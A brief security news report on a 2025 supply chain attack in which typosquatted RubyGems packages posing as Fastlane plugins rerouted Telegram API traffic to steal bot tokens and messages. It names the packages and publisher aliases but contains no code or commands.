Hackers Use Ruby Gems to Steal Telegram Bot Tokens

Hackers have launched a targeted supply chain attack against the RubyGems ecosystem, deploying malicious packages to exfiltrate Telegram bot tokens and messages. The campaign, detected by Socket.dev researchers, coincided with Vietnam’s nationwide block of Telegram on May 21, 2025. Threat actors uploaded two typosquatted gems—fastlane-plugin-telegram-proxy and fastlane-plugin-proxy_teleram—masquerading as legitimate Fastlane plugins widely used in CI/CD pipelines.

By subtly altering one line of code, the attackers rerouted Telegram API traffic to a command-and-control server hosted on Cloudflare Workers. This allowed them to intercept bot tokens, message content, and file attachments while maintaining the plugin’s expected functionality. The packages were published under aliases including Bùi nam, buidanhnam, and si_mobile.

The attack’s minimal code changes and strategic timing underscore growing threats to developer supply chains. Exploiting geopolitical unrest, the actors marketed the tools as Telegram workarounds, highlighting how adversaries adapt quickly to global events for cyber exploitation.